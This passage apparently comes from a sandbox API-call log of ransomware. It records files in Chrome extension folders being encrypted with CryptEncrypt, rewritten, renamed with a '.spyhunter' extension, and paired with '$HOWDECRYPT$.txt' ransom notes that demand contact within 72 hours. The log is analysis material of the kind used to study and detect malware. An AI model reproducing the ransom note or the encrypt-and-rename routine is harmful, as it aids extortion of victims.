(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.172] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec10*=0x2ac, lpOverlapped=0x0) returned 1 [0159.172] CloseHandle (hObject=0x178) returned 1 [0159.172] GetProcessHeap () returned 0x2c0000 [0159.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1bcc8 | out: hHeap=0x2c0000) returned 1 [0159.172] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebb0 | out: pbBuffer=0x25cebb0) returned 1 [0159.173] GetProcessHeap () returned 0x2c0000 [0159.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.173] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceba8*=0x30) returned 1 [0159.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0159.174] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.174] GetProcessHeap () returned 0x2c0000 [0159.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.174] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb6c*=0xfe, lpOverlapped=0x0) returned 1 [0159.199] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.199] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb6c*=0xfe, lpOverlapped=0x0) returned 1 [0159.200] GetProcessHeap () returned 0x2c0000 [0159.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.200] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.200] WriteFile (in: hFile=0x178, lpBuffer=0x25cebac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x25cebac*, lpNumberOfBytesWritten=0x25ceb6c*=0x4, lpOverlapped=0x0) returned 1 [0159.200] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb6c*=0x30, lpOverlapped=0x0) returned 1 [0159.200] CloseHandle (hObject=0x178) returned 1 [0159.200] GetProcessHeap () returned 0x2c0000 [0159.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.201] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.spyhunter") returned 165 [0159.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0159.202] GetProcessHeap () returned 0x2c0000 [0159.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.202] GetProcessHeap () returned 0x2c0000 [0159.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.202] GetProcessHeap () returned 0x2c0000 [0159.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82b18 | out: hHeap=0x2c0000) returned 1 [0159.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceba8 | out: pbBuffer=0x25ceba8) returned 1 [0159.203] GetProcessHeap () returned 0x2c0000 [0159.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceba0*=0x30) returned 1 [0159.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0159.204] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0159.204] GetProcessHeap () returned 0x2c0000 [0159.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.204] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb64*=0x180f, lpOverlapped=0x0) returned 1 [0159.317] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe7f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.317] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x180f, lpNumberOfBytesWritten=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb64*=0x180f, lpOverlapped=0x0) returned 1 [0159.318] GetProcessHeap () returned 0x2c0000 [0159.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.318] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.318] WriteFile (in: hFile=0x178, lpBuffer=0x25ceba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x25ceba4*, lpNumberOfBytesWritten=0x25ceb64*=0x4, lpOverlapped=0x0) returned 1 [0159.318] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb64*=0x30, lpOverlapped=0x0) returned 1 [0159.318] CloseHandle (hObject=0x178) returned 1 [0159.318] GetProcessHeap () returned 0x2c0000 [0159.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.318] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.spyhunter") returned 147 [0159.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.spyhunter")) returned 1 [0159.320] GetProcessHeap () returned 0x2c0000 [0159.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.320] GetProcessHeap () returned 0x2c0000 [0159.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.320] GetProcessHeap () returned 0x2c0000 [0159.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff58f0 | out: hHeap=0x2c0000) returned 1 [0159.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.321] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.321] WriteFile (in: hFile=0x178, lpBuffer=0x25ceadb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x25ceadb*, lpNumberOfBytesWritten=0x25cec04*=0x127, lpOverlapped=0x0) returned 1 [0159.323] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.323] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec04*=0x2ac, lpOverlapped=0x0) returned 1 [0159.323] CloseHandle (hObject=0x178) returned 1 [0159.323] GetProcessHeap () returned 0x2c0000 [0159.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07600 | out: hHeap=0x2c0000) returned 1 [0159.323] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceba0 | out: pbBuffer=0x25ceba0) returned 1 [0159.323] GetProcessHeap () returned 0x2c0000 [0159.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb98*=0x30) returned 1 [0159.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0159.325] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.325] GetProcessHeap () returned 0x2c0000 [0159.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.325] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb5c*=0x2d0, lpOverlapped=0x0) returned 1 [0159.385] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.386] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb5c*=0x2d0, lpOverlapped=0x0) returned 1 [0159.386] GetProcessHeap () returned 0x2c0000 [0159.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.386] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.386] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb9c*, lpNumberOfBytesWritten=0x25ceb5c*=0x4, lpOverlapped=0x0) returned 1 [0159.386] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb5c*=0x30, lpOverlapped=0x0) returned 1 [0159.386] CloseHandle (hObject=0x178) returned 1 [0159.386] GetProcessHeap () returned 0x2c0000 [0159.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.386] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.spyhunter") returned 169 [0159.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0159.388] GetProcessHeap () returned 0x2c0000 [0159.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.388] GetProcessHeap () returned 0x2c0000 [0159.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.388] GetProcessHeap () returned 0x2c0000 [0159.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f821e8 | out: hHeap=0x2c0000) returned 1 [0159.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.389] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.389] WriteFile (in: hFile=0x178, lpBuffer=0x25cead3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x25cead3*, lpNumberOfBytesWritten=0x25cebfc*=0x127, lpOverlapped=0x0) returned 1 [0159.390] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.390] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebfc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.390] CloseHandle (hObject=0x178) returned 1 [0159.390] GetProcessHeap () returned 0x2c0000 [0159.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07138 | out: hHeap=0x2c0000) returned 1 [0159.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb98 | out: pbBuffer=0x25ceb98) returned 1 [0159.391] GetProcessHeap () returned 0x2c0000 [0159.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.391] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb90*=0x30) returned 1 [0159.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0159.392] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.392] GetProcessHeap () returned 0x2c0000 [0159.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.392] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb54*=0x44b, lpOverlapped=0x0) returned 1 [0159.460] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.460] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x44b, lpNumberOfBytesWritten=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb54*=0x44b, lpOverlapped=0x0) returned 1 [0159.460] GetProcessHeap () returned 0x2c0000 [0159.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.460] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.460] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x25ceb94*, lpNumberOfBytesWritten=0x25ceb54*=0x4, lpOverlapped=0x0) returned 1 [0159.461] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb54*=0x30, lpOverlapped=0x0) returned 1 [0159.461] CloseHandle (hObject=0x178) returned 1 [0159.461] GetProcessHeap () returned 0x2c0000 [0159.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.461] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.spyhunter") returned 169 [0159.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), 